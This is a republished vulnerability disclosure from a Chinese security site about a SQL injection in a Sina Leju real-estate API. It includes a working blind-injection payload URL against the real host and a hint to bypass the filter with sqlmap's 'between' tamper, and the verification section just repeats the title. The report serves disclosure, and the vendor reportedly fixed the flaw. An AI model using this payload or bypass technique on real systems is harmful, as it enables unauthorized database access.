神刀安全网

漏洞標題: 新浪乐居某站SQL注入可绕过过滤(大陆地区)

漏洞詳情

披露狀態:

2016-04-20: 細節已通知廠商並且等待廠商處理中
2016-04-21: 廠商已經確認,細節僅向廠商公開
2016-04-22: 廠商已經修復漏洞並主動公開,細節向公眾公開

大概描述:

新浪乐居某站SQL注入可绕过过滤

詳細說明:

不唠叨了,直接贴payload,MySQL盲注。

http://house.leju.com/api/api.agent.php?key=634ea0d5da4600b5&module=month_kaipan_youhui&city=zhongshan' and 1=(case when 1=1 then 1 else (select 1 from information_schema.tables) end) and 'a'='a&return=jsonp&encode=utf-8&callback=_1461134370128102

直接丢SQLmap跑一下,>被过滤了,用between tamper可以绕过,不深挖了。

漏洞驗證:

漏洞標題:  新浪乐居某站SQL注入可绕过过滤(大陆地区)

漏洞標題:  新浪乐居某站SQL注入可绕过过滤(大陆地区)

漏洞標題:  新浪乐居某站SQL注入可绕过过滤(大陆地区)

修復方案:

过滤,参数化查询

版權聲明:轉載請註明來源 夏殇@烏雲

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞標題: 新浪乐居某站SQL注入可绕过过滤(大陆地区)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址